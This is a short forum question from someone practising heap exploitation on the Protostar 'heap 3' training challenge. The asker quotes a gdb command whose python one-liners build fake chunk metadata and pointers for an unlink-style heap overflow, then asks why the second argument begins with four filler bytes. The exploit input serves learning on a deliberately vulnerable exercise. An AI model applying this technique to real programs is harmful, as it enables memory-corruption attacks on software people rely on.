# want to know about heap exploit

Tags: heap-overflow

I am practicing my heap exploit skill with following website.

http://hatriot.github.io/blog/2014/09/21/protostar-heap-exploits/.
But under the title of heap 3 exploit,
I didnot understand with what it does.

> (gdb) r AAAA$(python -c 'print "A"*28 + "\xfc\xff\xff\xff" +
>   "\xfc\xff\xff\xff"') $(python -c 'print "\x41"*4 + "\x1c\xb1\x04\x08"
>   + "\x0c\xc0\x04\x08"') CCCC

It is exploiting metadata of heap.I understand first argument which overflow
Prev_size and size of chunk B.But in second argument,why he starts with 'B'*4 .Why? I think it should follow fd and bk.Please explain me.Thank you